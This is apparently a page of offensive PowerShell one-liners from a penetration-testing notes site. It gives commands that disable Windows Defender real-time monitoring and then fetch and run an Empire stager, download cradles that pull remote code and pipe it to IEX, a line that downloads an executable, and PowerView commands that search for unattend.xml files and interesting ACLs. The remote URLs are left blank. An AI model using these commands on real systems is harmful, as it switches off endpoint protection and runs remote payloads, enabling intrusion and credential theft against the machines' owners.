random_powershell
Last updated
Was this helpful?
Last updated
Was this helpful?
RANDOM POWERSHELL This works for disabling Windows Defender and running empire stager:
powershell -exec bypass Set-MpPreference -DisableRealtimeMonitoring $true && cmd /c "powershell -noninteractive -command IEX (New-Object Net.WebClient).DownloadString('')"
Download Cradle
(new-object System.Net.Webclient).DownloadString('')
Download Cradle and Execute
(new-object System.Net.Webclient).DownloadString('') | IEX
Download EXE and place it
IEX (new-object System.Net.Webclient).DownloadFile('')
PowerView - Find interesting files e.g., unattend.xml
Find-InterestingFile -Path 'C:\' -Include 'unattend*.xml'
Find-InterestingACL